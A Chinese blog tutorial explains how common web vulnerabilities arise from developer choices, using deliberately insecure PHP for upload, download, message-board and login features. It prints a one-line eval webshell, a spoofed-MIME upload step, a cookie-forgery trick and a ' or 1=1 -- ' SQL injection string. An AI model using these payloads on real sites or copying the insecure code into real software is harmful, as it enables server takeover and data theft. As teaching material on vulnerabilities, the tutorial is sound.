从开发角度理解漏洞成因(02)

文章目录

  • 文件上传类
    • 需求
      • 文件上传漏洞
  • 文件下载类
    • 需求
      • 文件下载漏洞
    • 扩展
  • 留言板类(XSS漏洞)
    • 需求
      • XSS漏洞
  • 登录类
    • 需求
    • cookie伪造漏洞
    • 万能密码登录

持续更新中…

文章中代码资源已上传资源,如需要打包好的请点击PHP开发漏洞环境(SQL注入+文件上传+文件下载+XSS+万能密码+session/cookie的学习等等)

文件上传类

需求

1、在博客文件中生成上传文件的功能
2、只允许上传jpg、jpeg、png文件格式

upload.php

<!DOCTYPE html>  
<html>  
<head>  
    <title>文件上传</title>  
</head>  
<body>  
<h2>文件上传</h2>  
<form action="" method="POST" enctype="multipart/form-data">  
    <input type="file" name="upload">  
    <input type="submit" value="上传">  
</form>  
</body>  
</html>  
  
<?php  
header("Content-Type: text/html; charset=UTF-8"); //设置字符集  
//获取文件名字  
@$name = $_FILES['upload']['name'];  
//获取上传文件的类型  
@$type = $_FILES['upload']['type'];  
//获取上传文件的大小  
@$size = $_FILES['upload']['size'];  
//获取上传文件的错误代码  
@$error = $_FILES['upload']['error'];  
//获取上传文件的临时文件名  
@$tmp_name = $_FILES['upload']['tmp_name'];  
  
echo @$name . "<br>";//打印  
echo @$type . "<br>";  
echo @$size . "<br>";  
echo @$error . "<br>";  
echo @$tmp_name . "<br>";  
  
if ($type == "image/jpeg" || $type == "image/jpg" || $type == "image/png") {  
    if (!move_uploaded_file($tmp_name, 'upload/' . $name)) {  
        echo "文件移动失败";  
    } else {  
        echo '/upload/' . $name;  
        echo "文件上传成功";  
    }  
} else {  
    echo "文件类型不正确";  
}  
?>

文件上传漏洞

通过代码分析,做了文件类型的判断,只限于jpeg、png、jpg 三种类型进行上传,那么上传php一句话木马会提示文件类型不正确,并且在目录中未发现上传的文件

试想既然知道有限制,那么我们能不能抓包修改文件类型呢?

上传一个一句话木马文件,文件后缀 .php

<?php @eval($_POST['cmd']);?>

修改为: Content-Type:image/png,放包

发现上传成功并获取到了路径

进行漏洞利用

文件下载类

需求

1、创建一个文件下载的功能
2、在soft文件夹中提取所需要的东西
3、需要有选择框,以供选择

download.php

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <title>文件下载</title>  
</head>  
<body>  
<h1>直接下载</h1>  
<?php  
// 获取文件路径  
$filepath = '../soft/';  
  
// 获取文件列表  
$filenames = scandir($filepath);  
  
// 创建下载表单  
echo '<form action="" method="POST">';  
echo '需要下载的文件:<select name="name">';  
  
// 生成文件下拉选项  
foreach ($filenames as $filename) {  
    if ($filename != '.' && $filename != '..') {  
        echo '<option value="' . $filename . '">' . $filename . '</option>';  
    }  
}  
  
// 关闭下载表单  
echo '</select>';  
echo '<input type="submit" value="下载">';  
echo '</form>';  
  
// 处理文件下载  
if (isset($_POST['name'])) {  
    $name = $_POST['name'];  
    $file = $filepath . $name;  
  
    // 检查文件是否存在  
    if (file_exists($file)) {  
        $filesize = filesize($file);  
  
        // 设置下载文件的相关头信息  
        header('Content-Type: application/octet-stream');  
        header('Content-Disposition: attachment; filename="' . $name . '"');  
        header('Content-Length: ' . $filesize);  
  
        // 读取文件内容并输出给用户  
        readfile($file);  
        exit;  
    } else {  
        echo '文件不存在!';  
    }  
}  
?>  
</body>  
</html>

文件下载漏洞

分析代码发现下载文件名由name决定,那么我们就可以尝试构造任意文件名,跳目录,造成任意文件下载

抓包

修改文件名,可以任意读取源代码,造成任意文件下载读取漏洞

扩展

文件类漏洞,还有如下漏洞类型,不一一举例,原理都差不多,如:
1、任意文件删除
2、任意文件写入
3、文件包含等等

WEB漏洞核心
1、可控变量
2、特定函数

留言板类(XSS漏洞)

需求

1、生成留言板功能
2、并写一个留言列表功能,可以看到留言人的姓名和内容

XSS漏洞

message.php

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <title>留言板</title>  
</head>  
<body>  
<h1>留言板</h1>  
  
<?php  
// 处理留言提交  
if (isset($_POST['submit'])) {  
    $name = $_POST['name'];  
    $message = $_POST['message'];  
    $timestamp = date('Y-m-d H:i:s');  
  
    // 将留言信息保存到文件  
    $file = 'messages.txt';  
    $data = $timestamp . ' - ' . $name . ': ' . $message . "\n";  
    file_put_contents($file, $data, FILE_APPEND);  
}  
?>  
  
<form action="" method="POST">  
    <label for="name">姓名:</label>  
    <input type="text" name="name" id="name" required><br>  
  
    <label for="message">留言:</label>  
    <textarea name="message" id="message" rows="4" required></textarea><br>  
  
    <input type="submit" name="submit" value="提交留言">  
</form>  
  
<hr>  
  
<h2>留言列表</h2>  
  
<?php  
// 读取留言列表  
$file = 'messages.txt';  
if (file_exists($file)) {  
    $messages = file($file);  
  
    // 显示留言列表  
    foreach ($messages as $message) {  
        echo $message . '<br>';  
    }  
} else {  
    echo '暂无留言。';  
}  
?>  
</body>  
</html>

通过代码分析,发现留言的信息都存在message.txt 文件里,然后进行读取放到留言列表中,这里可能造成存储型XSS漏洞,那么我们试试构造JS语句,看是否被执行。

点击提交留言,发现存在xss漏洞,并存储在message.txt 文件里,每次刷新都会调用,说明存在存储型XSS漏洞

登录类

需求

1、生成登录页面
2、使用session或cookie进行验证
3、登录时使用验证码校验
4、必须使用‘user1’账号,才能登录管理员后台

login.php(cookie验证)

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <title>登录页面</title>  
    <link rel="stylesheet" type="text/css" href="../login.css">  
</head>  
<body>  
<div class="container">  
    <h2>欢迎登录</h2>  
    <form action="login.php" method="POST">  
        <div class="form-group">  
            <label for="username">用户名:</label>  
            <input type="text" id="username" name="username" required>  
        </div>        <div class="form-group">  
            <label for="password">密码:</label>  
            <input type="password" id="password" name="password" required>  
        </div>        <div class="form-group">  
            <label for="captcha">验证码:</label>  
            <input type="text" id="captcha" name="captcha" required>  
            <img src="captcha.php" alt="验证码">  
        </div>        <button type="submit" name="login">登录</button>  
    </form></div>  
</body>  
</html>  
  
<?php  
session_start();  
  
include('../config/conn.php');  
  
@$username = $_POST['username'];  
@$password = $_POST['password'];  
@$captcha = $_POST['captcha'];  
  
// 验证验证码  
  
if (isset($_POST['login'])) {  
    if (isset($_SESSION['captcha']) && strtolower($captcha) === strtolower($_SESSION['captcha'])) {  
        // 验证用户名和密码  
        $sql = "SELECT * FROM pass WHERE username = '$username' AND password = '$password'";  
        $result = mysqli_query($conn, $sql);  
        echo $sql;  
/*  
        if (mysqli_num_rows($result)) {            echo "登录成功";  
            header("location:../admin/admin_login.php"); // 验证成功跳转到后台页面  
            setcookie("username", $username, 0, '/'); // 设置cookie  
        } else {            echo "用户名或密码错误";  
        }    } else {        echo "验证码错误";  
    }}  
//  
*/  
//session验证  
  
        while (@$row = mysqli_fetch_array(@$result)) {//成功登录后  
            $_SESSION['username'] = $row['username'];//将查询结果的数据进行赋值  
            header("location:../admin/admin_login.php");//验证成功跳转到后台页面  
        }  
    }  
}  
  
?>

admin_login.php(登录校验)

<?php  
include ("../config/login_check.php"); //cookie验证  
  
/*  
session验证  
header("Content-type:text/html;charset=utf-8");//编码  
session_start();  
if (@$_SESSION['username']=='user1'){  
    echo '登录成功,这里是管理员后台';  
}else{  
    echo '非法访问';  
}  
?>  
*/  
?>

login_check.php (cookie验证)

<?php  
//1、先验证登录,才进行代码操作  
//2、cookie验证  
//3、session验证  
header("Content-type:text/html;charset=utf-8");//编码  
@$username = $_COOKIE['username'];//接受cookie  
if ($username == 'user1') {//只有当用户名为'user1'时才能登录到管理员后台  
    echo '登录成功,这里是后台管理界面';  
} elseif ($username != '') {//其他用户验证成功  
    echo '登录成功';  
} else {  
    echo "非法访问";  
}  
?>

captcha.php 验证码

<?php  
session_start();  
  
// 生成随机验证码  
$length = 4; // 验证码长度  
$characters = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'; // 验证码字符集  
$captcha = '';  
for ($i = 0; $i < $length; $i++) {  
    $captcha .= $characters[rand(0, strlen($characters) - 1)];  
}  
  
// 存储验证码到 Session$_SESSION['captcha'] = $captcha;  
  
// 创建验证码图片  
$imageWidth = 110;  
$imageHeight = 80;  
$image = imagecreatetruecolor($imageWidth, $imageHeight);  
$backgroundColor = imagecolorallocate($image, 255, 255, 255);  
$textColor = imagecolorallocate($image, 0, 0, 0);  
  
// 填充背景色  
imagefilledrectangle($image, 0, 0, $imageWidth, $imageHeight, $backgroundColor);  
  
// 绘制验证码文本  
$textX = ($imageWidth - 50) / 2;  
$textY = $imageHeight / 2 + 10;  
imagestring($image, 5, $textX, $textY, $captcha, $textColor);  
  
// 输出验证码图片  
header('Content-Type: image/png');  
imagepng($image);  
imagedestroy($image);  
?>

验证是否符合需求

user1 管理登录后台

其他用户登录,不前往管理员后台

cookie伪造漏洞

通过代码分析,后端校验用户为 user1 即可登录到管理员后台

修改cookie为 user1,刷新即可登录到管理元后台

万能密码登录

通过代码审计发现对数据库做校验的时候,出现了一些问题,如下:

$sql = "SELECT * FROM pass WHERE username = '$username' AND password = '$password'";

把 $username 替换成 如下:

SELECT * FROM pass WHERE username = '1' or 1=1 -- ' AND password = '$password'

这样就形成了,万能密码登录

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/609270.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

当导师和学生陷入「隐形冲突」

::: block-1 “时问桫椤”是一个致力于为本科生到研究生教育阶段提供帮助的不太正式的公众号。我们旨在在大家感到困惑、痛苦或面临困难时伸出援手。通过总结广大研究生的经验&#xff0c;帮助大家尽早适应研究生生活&#xff0c;尽快了解科研的本质。祝一切顺利&#xff01;—…

AI写的论文AI疑似度太高怎么办?教你一招解决

随着 AI 技术迅猛发展&#xff0c;各种AI辅助论文写作的工具层出不穷&#xff01; 为了防止有人利用AI工具进行论文代写&#xff0c;在最新的学位法中已经明确规定“已经获得学位者&#xff0c;在获得该学位过程中如有人工智能代写等学术不端行为&#xff0c;经学位评定委员会…

易基因:Nature子刊:ChIP-seq等揭示c-di-AMP与DasR互作以调控细菌生长、发育和抗生素合成|项目文章

大家好&#xff0c;这里是专注表观组学十余年&#xff0c;领跑多组学科研服务的易基因。 c-di-AMP是一种在细菌信号中普遍存在且至关重要的核苷酸第二信使&#xff0c;对于大多数c-di-AMP合成生物体来说&#xff0c;c-di-AMP稳态及其信号转导的分子机制非常值得关注。 2024年…

智慧仓储可视化大屏,以最直观的形式展示海量数据。

智慧仓储可视化大屏是一种通过数据可视化技术&#xff0c;将仓储管理系统中的海量数据以图表、地图、仪表盘等形式直观展示在大屏上的解决方案。它可以帮助仓储管理人员更清晰地了解仓库的运营情况&#xff0c;从而做出更明智的决策。 智慧仓储可视化大屏通常包括以下功能和特点…

护眼灯有没有护眼的效果?六大技巧教你选到护眼效果好的护眼台灯

随着孩子学习压力增大&#xff0c;护眼灯的重要性日益凸显。那么&#xff0c;护眼灯有没有护眼的效果&#xff1f;答案是肯定的&#xff0c;但关键在于如何挑选。本文将分享六大选购技巧&#xff0c;帮助大家挑选到护眼效果卓越的台灯&#xff0c;确保孩子在明亮而舒适的光线下…

论文AI疑似度太高怎么办?教你一招解决AIGC降重问题

随着 AI 技术迅猛发展&#xff0c;各种AI辅助论文写作的工具层出不穷&#xff01; 为了防止有人利用AI工具进行论文代写&#xff0c;在最新的学位法中已经明确规定“已经获得学位者&#xff0c;在获得该学位过程中如有人工智能代写等学术不端行为&#xff0c;经学位评定委员会…

苹果15能用哪些充电宝?充电宝什么牌子好?好用充电宝排名

随着移动设备的普及和功能的不断强大&#xff0c;我们对于充电宝的需求也越来越高。尤其是对于苹果15用户来说&#xff0c;选择一款兼容性好、性能稳定的充电宝显得尤为重要。在市面上众多充电宝品牌中&#xff0c;如何选择适合苹果15的充电宝&#xff1f;究竟哪个牌子的充电宝…

【密评】 | 商用密码应用安全性评估从业人员考核题库(7/58)

量子密钥分发&#xff08;QKD&#xff09;技术采用&#xff08;&#xff09;作为信息载体&#xff0c;经由量子通道在合法的用户之间传送密钥。 A. 数据 B. 电流 C. 量子态 D. 文本 置换&#xff08;permutation&#xff09;密码是把明文中的各字符&#xff08;&#xff09;得…

tag-字符串:最长公共前缀

题目 编写一个函数来查找字符串数组中的最长公共前缀。 如果不存在公共前缀&#xff0c;返回空字符串 “”。 示例 题解一 class Solution:def longestCommonPrefix(self, strs: List[str]) -> str:# 按照字典顺序找到strs中最大的字符串和最小的字符串str0 min(strs)st…

深入了解二叉搜索树:原理、操作与应用

文章目录 二叉搜索树二叉搜索树的操作1.查找操作2.插入操作3.查找最大值或者最小值4.删除操作5.前序中序后序遍历 总结 二叉搜索树 形如上图的二叉树就是二叉搜索树&#xff0c;接下来我们来具体阐述一下什么是二叉搜索树。 二叉搜索树的概念&#xff1a;满足左子树的值小于根…

winform图书销售管理系统+mysql

winform图书销售管理系统mysql数据库说明文档 运行前附加数据库.mdf&#xff08;或sql生成数据库&#xff09; 功能模块&#xff1a; 管理员:ttt 123 登陆可以操作我的 个人信息 修改密码 用户信息 添加删除用户 图书 添加删除图书信息 购物车 购买订单信息 充值 退出账户 …

网络安全之弱口令与命令爆破(下篇)(技术进阶)

目录 一&#xff0c;什么是弱口令&#xff1f; 二&#xff0c;为什么会产生弱口令呢&#xff1f; 三&#xff0c;字典的生成 四&#xff0c;九头蛇&#xff08;hydra&#xff09;弱口令爆破工具 1&#xff0c;破解ssh登录密码 2&#xff0c;破解windows登录密码 3&#xf…

Cesium的使用和特点

Cesium 是一款开源的 JavaScript 库&#xff0c;用于在 Web 上可视化地理空间数据。它广泛用于创建 3D 地球、地图和其他地理空间应用程序。Cesium 具有以下特点使其成为地理空间开发的流行选择。北京木奇移动技术有限公司&#xff0c;专业的软件外包开发公司&#xff0c;欢迎交…

华为OD机试 - 手机App防沉迷系统(Java 2024 C卷 100分)

华为OD机试 2024C卷题库疯狂收录中&#xff0c;刷题点这里 专栏导读 本专栏收录于《华为OD机试&#xff08;JAVA&#xff09;真题&#xff08;A卷B卷C卷&#xff09;》。 刷的越多&#xff0c;抽中的概率越大&#xff0c;每一题都有详细的答题思路、详细的代码注释、样例测试…

git合并分支

1、vscode安装插件Git Graph 2、点击右下角分支&#xff0c;比如要把dev分支合并到其他分支 首先dev分支的全部提交了&#xff0c;然后切换到其他分支 3、选择被合并的分支 点提交就好了

中医课堂丨名医面对面,金保方教授专场健康科普交流圆满举行

5月8日下午&#xff0c;李良济特邀金保方教授&#xff0c;在苏州太湖国际高尔夫俱乐部&#xff0c;以“生殖健康漫谈”为主题开展专场科普交流活动&#xff0c;参与的嘉宾表示受益匪浅&#xff0c;反响强烈。 本次活动主要包含了专家讲座、专家答疑义诊&#xff0c;现在就让我…

Java基础编程(高级部分)

1. 类变量和类方法 1.1 什么是类变量 类变量也叫静态变量/静态属性&#xff0c;是该类的所有对象共享的变量,任何一个该类的对象去访问它时,取到的都是相同的值同样任何一个该类的对象去修改它时,修改的也是同一个变量。 1.2 定义类变量 1.3 访问类变量 类名.类变量名 或者 对…

【GD32H757Z海棠派使用手册】第七讲 FWDG-看门狗实验

7.1 实验内容 通过本实验主要学习以下内容&#xff1a; 独立看门狗的原理 独立看门狗功能介绍 实现独立看门狗功能 7.2 实验原理 7.2.1 看门狗的原理 一般来说&#xff0c;搭配MCU的产品都需要有长期运行的需求&#xff0c;特别像一些工业设备&#xff0c;可能要求运行个…

微信团队开源的跨平台数据库框架 | 开源日报 No.249

Tencent/wcdb Stars: 10.4k License: NOASSERTION wcdb 是由微信开发的跨平台数据库框架。 该项目主要功能、关键特性、核心优势包括&#xff1a; 易于使用ORM&#xff08;对象关系映射&#xff09;WINQ&#xff08;WCDB 语言集成查询&#xff09;高效性能多线程并发支持完备…

element ui的无法关掉的提示弹框

使用element的$alert组件的属性把X去掉和确定按钮和取消按钮去掉&#xff1b; import { MessageBox } from element-ui; MessageBox.alert(AI功能已到期或暂未开启, 友情提示, {showClose: false,showCancelButton: false,showConfirmButton: false }); 如果在router的路由守…